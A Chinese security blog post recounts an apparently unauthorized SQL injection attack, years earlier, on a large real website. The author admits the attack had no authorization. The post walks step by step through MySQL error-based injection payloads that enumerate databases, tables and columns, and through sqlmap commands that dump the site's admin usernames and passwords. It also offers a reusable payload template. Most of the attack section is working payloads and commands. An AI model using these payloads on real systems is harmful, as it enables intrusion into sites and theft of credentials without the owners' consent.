原创 | 记N年前的一次渗透测试!

admin
admin
admin
144543
文章
118
评论
2025年6月10日17:47:05评论12 views字数 2626阅读8分45秒阅读模式
还记得年少时的梦吗?像朵永远不凋零的花,陪我经过那风吹雨打,看世事无常!看沧桑变化!

原创 | 记N年前的一次渗透测试!

今天在整理自己的一些老仓库硬盘,发现自己N年前撸过一个站,好像还是一个大站,xx在线xx分站,废话不说,直接还原当年的步骤,站点我都打码了,毕竟只是一次渗透测试!
当年这个站,还是挺大的,哈哈,好玩的很!现在已经打不开了!
网址:9605b51c5e694c6a596d996c226279c4
网站名称:2b030f6f63f80bf2199e6d0d67275513
常规操作第一步:

原创 | 记N年前的一次渗透测试!

扫描,那时候很菜,就直接扫注入。

原创 | 记N年前的一次渗透测试!

工具是OWASP  ZAP,VEGA 这2个都还好,速度很快

不知道各位师傅听说这些工具没有,那个时代,这些工具是神器!

原创 | 记N年前的一次渗透测试!

4个注入点,我随便来一个。就OK了。

注入点:http://xxxx.xxxxx.com.cn/company/shop_list.php?nid=60

Ps:那时候没有授权的这个概念

原创 | 记N年前的一次渗透测试!

你们懂了吧~~

MYSQL 手工报错注入+工具注入

先说手工的,咱们来对比学习下。

我们现在看下:显字位

手工的不多说了,5.0以上 直接order by

工具的说下:

我们用burp 代理下,然后联合查询 order by 1--  在1这里设置字典变量,查看返回信息。

看下图片:

原创 | 记N年前的一次渗透测试!

接下来,我们看下数据库信息。其实都知道是5.0的了,那么大的站,5.0以下少。

手工出来的:

查看版本mysql版本

+and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)

原创 | 记N年前的一次渗透测试!

上工具:SQLMAP:sqlmap -u  url

原创 | 记N年前的一次渗透测试!

还是手工的快呀。

咱们继续

我们来手工暴库 :

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

原创 | 记N年前的一次渗透测试!

原创 | 记N年前的一次渗透测试!

看到了。

更改的地方在:

FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1)

改成 LIMIT 1,1),LIMIT 2,1) 依次暴库 就OK了

我为了速度,就不一一来了。

工具:SQLMAP

sqlmap -u    url     -dbs

原创 | 记N年前的一次渗透测试!

当前数据库:

原创 | 记N年前的一次渗透测试!

出来一个16进制的:

70726F64756374

原创 | 记N年前的一次渗透测试!

Product  当前库

我们继续爆

我们现在要知道表名了:

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=hex库名 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

在表名哪里换上我们前面爆出的库名

原创 | 记N年前的一次渗透测试!

61646D696E

原创 | 记N年前的一次渗透测试!

是ADMIN的

工具看下:

Sqlmap -u   url  -D 库 -tables

原创 | 记N年前的一次渗透测试!

实话实说,我用VPN香港的,SQLMAP速度都非常可观!

接着我们来爆内容:

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x70726F64756374 and table_name=0x61646D696E limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

原创 | 记N年前的一次渗透测试!

我们还是更改后面的参数进行爆更多的内容

原创 | 记N年前的一次渗透测试!

继续

原创 | 记N年前的一次渗透测试!

太多了,直接工具

sqlmap -u url -D 库名 -T 表名 --columns

原创 | 记N年前的一次渗透测试!

看到曙光了吧

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,admin.username,0x27,0x7e) from admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

提供个格式:

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,表名.字段,0x27,0x7e) from 表名 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

没问题了吧?

原创 | 记N年前的一次渗透测试!

上面是密码,我们来整用户名:

原创 | 记N年前的一次渗透测试!

用户名:

原创 | 记N年前的一次渗透测试!

密码:

原创 | 记N年前的一次渗透测试!

接着工具,很快就出来了。

sqlmap -u http://xxxx.xxx.com.cn/company/shop_list.php?nid=60 -D product -T admin -C username,password --dump

原创 | 记N年前的一次渗透测试!

N年前的事情,现在也一样实用,很多大站,注入基本很少了,大家多考虑下逻辑漏洞,说不定,你的SRC奖金又高了。

 

原文始发于微信公众号(衡阳信安):原创 | 记N年前的一次渗透测试!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月10日17:47:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   原创 | 记N年前的一次渗透测试!https://cn-sec.com/archives/850449.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息